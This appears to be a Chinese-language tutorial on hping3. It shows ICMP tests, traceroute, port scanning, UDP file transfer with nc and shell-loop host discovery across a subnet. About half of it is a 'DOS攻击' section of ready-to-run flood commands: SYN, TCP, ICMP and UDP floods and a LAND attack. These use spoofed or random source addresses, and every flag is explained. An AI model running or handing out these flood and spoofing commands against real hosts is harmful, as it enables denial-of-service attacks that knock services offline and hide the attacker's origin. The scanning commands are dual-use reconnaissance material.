简介

hping3是一款免费的数据包生成器和分析器。可用于安全审计、防火墙规则测试、网络测试、端口扫描、性能测试，压力测试(DOS)，几乎可以发送任意类型的TCP/IP数据包。功能强大但是每次只能向一个IP地址发送数据包，还能够在两个相互包含的通道之间传送文件。

ICMP测试

hping3 -1 192.168.100.105（类似于ping 192.168.100.105）

数据包跟踪

hping3 –traceroute -V -1 www.baidu.com（类似于traceroute www.baidu.com）

端口扫描

单端口扫描

hping3 -I eth0 -p 22 -c 1 -S 192.168.100.104
hping3 -I eth0 -p 1 -c 1 -S 192.168.100.104

多端口扫描

hping3 -8 1-1024 192.168.100.102

文件传输

发送端：
hping3 -2 -p 1373 192.168.100.102 -d 100 -E test.txt
-2 UDP模式 -p端口
-d 数据大小 -E 文件名

接收端：
nc -lp 1373 -u -w 5 > recv.txt && cat recv.txt
-l 监听模式 -p 端口
-w 超时时间 -u UDP模式

主机发现

虽然hping3一次只能扫描一个IP，但是我们可以结合shell脚本语言完成整个网段的扫描。下面使用for循环来实现：
for addr in $(seq 1 254);do hping3 192.168.1.$addr -c 1 –icmp & done

for addr in $(seq 1 254);do hping3 192.168.1.$addr -c 1 –icmp >> result2.txt & done

cat result2.txt | grep ^len(通过该命令实现查看存活主机功能，^len表示以len开头的行)

DOS攻击

Syn Flood攻击

hping3 -c 1000 -d 120 -S -p 80 –flood –rand-source 192.168.100.1
-c 指定连接数 -p 目标端口
-d 指定数据部分的大小 -S 攻击类型是Syn flood
–flood 以泛洪的方式攻击 –rand-source 随机产生伪造源地址


hping3 -S -P -U -p 80 –flood –rand-source 192.168.100.1
-P flag置为Push -U flag置为Urge紧急
加这两参数可以提高效率

TCP Flood攻击

使用以下命令建立全连接：
hping3 -SARUPF -p 80 –flood –rand-source 192.168.100.1

ICMP Flood攻击

hping3 -q -n -d 200 –icmp –flood -a 11.11.11.11 192.168.100.1
-q安静模式 -n不解析域名 -a指定伪造IP

UDP Flood 攻击

hping3 –udp -s 6666 -p 53 -a 8.8.8.8 –flood 192.168.100.1


LAND攻击
hping3 -n -S -p 80 -a 192.168.100.1 –flood 192.168.100.1


hping原理、安装、使用详解介绍
hping3命令 | hping3